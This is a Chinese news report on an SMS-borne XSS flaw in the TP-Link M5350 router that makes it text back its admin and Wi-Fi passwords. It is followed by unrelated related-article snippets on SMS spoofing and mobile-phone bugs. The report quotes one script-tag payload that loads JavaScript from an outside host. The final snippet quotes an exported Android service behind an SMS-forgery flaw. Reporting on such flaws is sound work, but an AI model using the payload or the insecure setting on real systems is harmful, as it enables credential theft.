神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

本文讲的是神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码,TP-Link的设备漏洞库又增新丁。

这次的主角是TP-Link M5350,一款便携式3G路由器。

据Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

这是条什么短信呢?

<script src=//n.ms/a.js></script>
(不用试,研究员早把脚本下线了)

漏洞效果图

懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。

作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。

听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。

比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。

原文发布时间为:2017年4月12日

本文作者:longye

本文来自合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。

原文链接

时间: 2024-10-24 07:38:40

神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码的相关文章

广东实现发条短信就能信访

广东信访工作积极创新 网上信访效率高 文/记者 练情情 广东省网上信访今年7月添新举措,试运行了手机网上信访和短信信访.据广东省信访局统计,截至11月,共收到各类信访3308条.如今,不仅通过互联网可以发送信访件到广东网上信访平台,只要动动拇指发条短信到"10639888",投诉信就可直达广东网上信访平台.目前,已有不少群众尝到了手机信访.网上信访的甜头. 东街村入屋盗窃猖獗 解决:专人督办治安明显好转 今年8月,黄埔区南岗镇东街村村民黄女士居住的地段半个月内发生了多起小偷入屋行窃案件

java如何设置发送短信的节点,如:找回密码、更换手机/邮箱的节点

问题描述 java如何设置发送短信的节点,如:找回密码.更换手机/邮箱的节点 jva如何设置发送短信的节点,如:找回密码.更换手机/邮箱的节点 解决方案 和java没有关系,直接把这些写在你的找回密码.更换邮箱等功能里面就可以了. 解决方案二: 首先这个收发短信,你可以买短信猫类似的,会提供接口给你直接调用. 更换节点/邮箱的话你应该把以前的数据 更新就可以.

网爆:联通系统存漏洞 10010短信任意发

硅谷网9月8日消息 有黑客爆料称中国联通客服系统存有巨大漏洞.一般情况下联通10010号码只发一些套餐使用情况和充值成功与否的提示短信,但昨日有网友利用该漏洞自行发布来源为"10010"的短信并进行了展示. 此消息引发数家安全软件厂商发出"安全预警",提示消费者警惕冒充联通客服的欺诈短信. 可随意发送"10010"来源短信 <http://www.aliyun.com/zixun/aggregation/5254.html">

黑客今日展示iPhone漏洞用短信发动攻击

7月30日消息,据国外媒体报道,安全研究人员查理·米勒(Charlie Miller)周四将展示如何通过短信来攻击苹果iPhone手机. 在周四召开的"黑帽"(Blackhat)安全大会上,米勒将向与会人员展示如何通过手机短信对iPhone发动攻击.米勒称,只要通过一系列恶意短信即可控制iPhone.要阻止这一切,用户只能关闭手机. 其实,米勒早在本月初就宣布了该消息,但当时并未透露具体的攻击方法.米勒当时称,只要向iPhone用户发送一条短信,即可在iPhone上运行恶意代码或其他程

iPhone4再出漏洞:短信删不掉

已删除的信息依然能靠"搜索"功能"复活" 苹果:可带机器去旗舰店检测 本报讯(记者 冯祎)明明已被删除的短信,通过手机特有的搜索功能还能"复活",近日,经历了"信号门"风波后,正在热卖的iPhone4又被用户们揪出了一大漏洞. 昨天,记者在"WeiPhone.com"等论坛上看到,不少 网友发帖称发现了iPhone4的又一大"Bug"--短信删不掉. "我在短信界面已经把短信删

中国移动增值业务发条短信就能退

本报讯(记者马佳)不靠谱的手机收费项目可以快速撤销啦.昨天,中国移动在国内率先推出业务扣费主动提醒和增值业务0000统一查询退订两项"透明消费"服务举措,今后客户订购增值业务后,在扣费之前能够得到短信提醒,且只要发送短信"0000"到10086,就能便捷查询和退订已订购的包月类增值业务. 随着移动互联网的迅速发展,越来越多的增值业务服务商加入到通信产业链中来,手机新业务更加丰富多彩,但也有一些不良内容提供商暗中"偷吃"机主话费.中国移动此次推出的

中移动新举措:增值业务发条短信就能退

本报讯(记者马佳)不靠谱的手机收费项目可以快速撤销啦.昨天,中国移动在国内率先推出业务扣费主动提醒和增值业务0000统一查询退订两项"透明消费"服务举措,今后客户订购增值业务后,在扣费之前能够得到短信提醒,且只要发送短信"0000"到10086,就能便捷查询和退订已订购的包月类增值业务. 随着移动互联网的迅速发展,越来越多的增值业务服务商加入到通信产业链中来,手机新业务更加丰富多彩,但也有一些不良内容提供商暗中"偷吃"机主话费.中国移动此次推出的

沈阳贵族早教亲亲袋鼠发条短信就停业蒸发

"尊贵的会员,亲亲袋鼠××店4月7日停业,望大家周知!"4月6日晚,沈阳市近千名"亲亲袋鼠"早教中心××店的会员家长都收到了这样一条群发短信. 4月7日上午,某购物中心刚一开业,数十名会员家长便赶到了6楼的"亲亲袋鼠"早教中心,结果发现那里是"铁将军"把门,没有一名工作人员.而该购物中心张贴出的<紧急告知>,则让家长们心中仅存的一丝希望也完全破灭-- 状况:"贵族早教"课还没上完就停业 据家长们

android安全问题(八)伪造短信(利用原生android4.0漏洞)

android4.0发布已经是很久很久很久很久以前的事情了,这个漏洞早就报了出来,之所以现在才写这篇文 章,就是觉得,该升级的基本已经都升级了,该打补丁的基本都已经打了补丁,所以现在差不多是时候了. 原生android4.0系统中,Mms.apk的manifest有这样一段 <service android:name=".transaction.SmsReceiverService" android:exported="true" /> android: